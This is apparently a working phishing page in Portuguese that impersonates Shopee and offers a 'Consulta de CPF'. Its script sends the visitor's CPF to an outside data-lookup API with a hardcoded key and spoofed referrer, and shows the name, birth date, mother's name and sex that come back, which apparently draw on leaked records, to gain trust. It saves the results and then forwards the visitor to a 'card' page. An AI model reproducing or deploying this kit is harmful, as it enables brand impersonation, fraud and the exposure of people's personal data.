<!DOCTYPE html>
<html lang="pt-BR">


<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/png" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/icon_favicon_1_32.0Wecxv.png">
    <title>Consulta de CPF</title>
    <link href="../../cdn.jsdelivr.net/npm/bootstrap%405.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&amp;display=swap" rel="stylesheet">
    <style>
        body {
            font-family: 'Poppins', sans-serif;
            background-color: #f9f9f9;
            color: #333;
            margin: 0;
            padding: 0;
            display: flex;
            flex-direction: column;
            min-height: 100vh;
        }

        .header {
            background-color: #ffffff;
            padding: 20px;
            text-align: center;
            border-bottom: 3px solid #ee4d2d;
        }

        .header img {
            width: 150px;
        }

        .main-content {
            max-width: 500px;
            background: #fff;
            margin: 50px auto;
            padding: 30px;
            border-radius: 10px;
            box-shadow: 0 4px 15px rgba(0, 0, 0, 0.1);
        }

        .btn-custom {
            color: white;
            border: none;
            width: 100%;
            margin-bottom: 10px;
            background: #ee4d2d;
            font-weight: 600;
            border-radius: 1rem;
            padding: .75rem 3rem;
            letter-spacing: .3px;
            line-height: 1.15;
        }

        .btn-custom:hover {
            color: white !important;
            background-color: #000 !important;
            transform: scale(1.02) !important;
        }

        .footer {
            background: #ffffff;
            border-top: 1px solid #e6e6e6;
            text-align: center;
            padding: 15px;
            font-size: 10px;
            color: #666;
            margin-top: auto;
        }

        .result-box {
            margin-top: 20px;
            background-color: #f9f9f9;
            border: 1px solid #e6e6e6;
            border-radius: 8px;
            padding: 15px;
            display: none;
            text-align: left;
        }

        .result-box p {
            margin: 0 0 10px;
        }

        .loader {
            display: none;
            text-align: center;
            margin-bottom: 15px;
        }

        .loader img {
            width: 50px;
            height: 50px;
        }

        .success-message {
            text-align: center;
            font-weight: bold;
            color: green;
            margin-bottom: 15px;
        }

        .success-message img {
            width: 50px;
            height: 50px;
            display: block;
            margin: 0 auto 10px;
        }
    </style>

       <style>
        .flasher-container {
          position: fixed;
          top: 10px;
          right: 10px;
          z-index: 9999;
          width: 300px;
        }
  
        .flasher-container .flasher-message {
          background-color: #f8d7da;
          color: #721c24;
          border: 1px solid #f5c6cb;
          padding: 10px;
          margin-bottom: 10px;
          border-radius: 4px;
          font-size: 14px;
        }
  
        .flasher-container .flasher-message.success {
          background-color: #d4edda;
          color: #155724;
          border: 1px solid #c3e6cb;
        }
  
      </style>
</head>

<body>
    <div id="flasher-container" class="flasher-container"></div>
    <!-- Header -->
    <div class="header">
        <img src="../../logodownload.org/wp-content/uploads/2021/03/shopee-logo.png" alt="YES Card">
    </div>

    <!-- Main Content -->
    <div class="main-content">
        <p style="color:gray; text-align:initial">Preencha o CPF para consulta</p>
        <form id="cadastroForm" style="text-align:initial">
            <div class="mb-3">
                <label for="cpf" class="form-label" style="color:gray; font-size:13px">CPF</label>
                <input type="text" class="form-control" id="cpf" onkeyup="formatCpf(this)" onload="formatCpf(this)"
                    placeholder="000.000.000-00" maxlength="14" required="">
            </div>
        </form>
        <button id="consultarBtn" class="btn-custom">Consultar CPF</button>
        <div id="loader" class="loader">
            <img src="../../cdn.pixabay.com/animation/2023/08/11/21/18/21-18-05-265_512.gif" alt="Carregando...">
            <p>Consultando seus dados...</p>
        </div>

        <!-- Resultado -->
        <div id="resultBox" class="result-box">
            <div class="success-message">
                <img src="../../cdn-icons-png.flaticon.com/512/6784/6784655.png" alt="Aprovado">
                <p>Dados encontrados com sucesso!</p>
            </div>
            <p>Iniciando cadastro de: <br> <strong><span id="nomeCompleto"></span></strong></p>
            <p><strong>Data de Nascimento:<br></strong> <span id="dataNascimento"></span></p>
            <p><strong>Nome da Mãe:<br></strong> <span id="nomeMae"></span></p>
            <p><strong>Sexo:<br></strong> <span id="sexo"></span></p>
            <button class="btn-custom" onclick="continuar()">Continuar</button>
        </div>
    </div>

    <script>
        // Função para validar CPF
        function validateCpf(cpf) {
            cpf = cpf.replace(/[\.-]/g, ""); // Remove pontos e traços

            if (cpf.length !== 11 || /^([0-9])\1*$/.test(cpf)) {
                return false;
            }

            let sum = 0;
            let remainder;

            for (let i = 1; i <= 9; i++) {
                sum += parseInt(cpf.substring(i - 1, i)) * (11 - i);
            }

            remainder = (sum * 10) % 11;
            if (remainder === 10 || remainder === 11) {
                remainder = 0;
            }

            if (remainder !== parseInt(cpf.substring(9, 10))) {
                return false;
            }

            sum = 0;
            for (let i = 1; i <= 10; i++) {
                sum += parseInt(cpf.substring(i - 1, i)) * (12 - i);
            }

            remainder = (sum * 10) % 11;
            if (remainder === 10 || remainder === 11) {
                remainder = 0;
            }

            return remainder === parseInt(cpf.substring(10, 11));
        }

        // Função para formatar CPF em tempo real
        function formatCpf(input) {
            let cpf = input.value.replace(/\D/g, ""); // Remove caracteres não numéricos

            if (cpf.length > 3 && cpf.length <= 6) {
                input.value = cpf.replace(/(\d{3})(\d+)/, "$1.$2");
            } else if (cpf.length > 6 && cpf.length <= 9) {
                input.value = cpf.replace(/(\d{3})(\d{3})(\d+)/, "$1.$2.$3");
            } else if (cpf.length > 9) {
                input.value = cpf.replace(/(\d{3})(\d{3})(\d{3})(\d{1,2})/, "$1.$2.$3-$4");
            } else {
                input.value = cpf;
            }
        }

        // Adiciona evento ao input para formatar CPF em tempo real
        document.getElementById("cpf").addEventListener("input", function () {
            formatCpf(this);
        });

        // Função para exibir mensagens no DOM
        function showMessage(type, message) {
            const container = document.getElementById("flasher-container");
            const div = document.createElement("div");
            div.className = `flasher-message ${type}`;
            div.textContent = message;

            container.appendChild(div);

            setTimeout(() => {
                div.remove();
            }, 3000);
        }

        // Função para remover pontos e traços do CPF
        function removeCpfFormatting(cpf) {
            return cpf.replace(/[\.\-]/g, "");
        }

        document.getElementById('consultarBtn').addEventListener("click", async function (event) {
            event.preventDefault();

            const loader = document.getElementById("loader");
            const resultBox = document.getElementById("resultBox");
            const consultarBtn = document.getElementById("consultarBtn");

            const cpfInput = document.getElementById("cpf");
            const cpfValue = cpfInput.value;
            const cpfFormatado = removeCpfFormatting(cpfValue);

            if (!validateCpf(cpfValue)) {
                showMessage("error", "CPF informado é inválido. Por favor, tente novamente.");
                return;
            }

            loader.style.display = "block";
            consultarBtn.style.display = "none";
            resultBox.style.display = "none";

            try {
                // Consulta a API de CPF com a nova URL
                const cpfResponse = await fetch(`https://apela-api.tech/?user=ab3f881a-8a81-44de-bd81-a3ebe179ea04&cpf=${cpfFormatado}`, {
                    headers: {
                        "accept": "*/*",
                        "accept-language": "pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7",
                        "sec-ch-ua": '"Chromium";v="136", "Google Chrome";v="136", "Not.A/Brand";v="99"',
                        "sec-ch-ua-mobile": "?0",
                        "sec-ch-ua-platform": "\"Windows\"",
                        "sec-fetch-dest": "empty",
                        "sec-fetch-mode": "cors",
                        "sec-fetch-site": "cross-site"
                    },
                    referrer: "https://www.verificarvalores.online/",
                    referrerPolicy: "strict-origin-when-cross-origin",
                    body: null,
                    method: "GET",
                    mode: "cors",
                    credentials: "omit"
                });
                
                const data = await cpfResponse.json();
                
                let userData;
                
                if (data && data.nome) {
                    // Se a API retornou dados válidos
                    userData = {
                        cpf: cpfFormatado,
                        nomeCompleto: data.nome || "Não encontrado",
                        dataNascimento: data.nascimento || "Não encontrado",
                        nomeMae: data.mae || "Não encontrado",
                        sexo: data.sexo || "Não encontrado"
                    };
                } else {
                    // Em caso de erro, usar dados padrão para demonstração
                    const formattedCpf = cpfFormatado ? cpfFormatado.replace(/^(\d{3})(\d{3})(\d{3})(\d{2})$/, "$1.$2.$3-$4") : "CPF Não Informado";
                    userData = {
                        cpf: formattedCpf,
                        nomeCompleto: "CPF NÃO LOCALIZADO",
                        dataNascimento: "INFORMAÇÃO NÃO DISPONÍVEL",
                        nomeMae: "INFORMAÇÃO NÃO DISPONÍVEL",
                        sexo: "INFORMAÇÃO NÃO DISPONÍVEL"
                    };
                }
                
                // Atualiza a interface com os dados obtidos
                document.getElementById("nomeCompleto").innerText = userData.nomeCompleto;
                document.getElementById("dataNascimento").innerText = userData.dataNascimento;
                document.getElementById("nomeMae").innerText = userData.nomeMae;
                document.getElementById("sexo").innerText = userData.sexo;
                
                // Salvar os dados no localStorage
                localStorage.setItem("dadosCPF", JSON.stringify(userData));
                
                const dadosUsuario = JSON.parse(localStorage.getItem('dadosCPF'));
                
                if (dadosUsuario && dadosUsuario.nomeCompleto) {
                    loader.style.display = "none";
                    resultBox.style.display = "block";
                } else {
                    showMessage("error", "Verifique os dados informados e tente novamente em instantes.");
                    loader.style.display = "none";
                    consultarBtn.style.display = "block";
                }
            } catch (error) {
                showMessage("error", "Erro na comunicação com o servidor. Tente novamente em instantes.");
                loader.style.display = "none";
                consultarBtn.style.display = "block";
            }
        });

        function continuar() {
            window.location.href = "../card/index.html";
        }

    </script>

    <!-- Footer -->
    <div class="footer">
        Copyright 2025 Shopee. Todos os direitos reservados.<br>

        Política de Privacidade | Termos de Uso Vendas e Reembolsos | Legal Mapa do Site
    </div>
</body>

</html>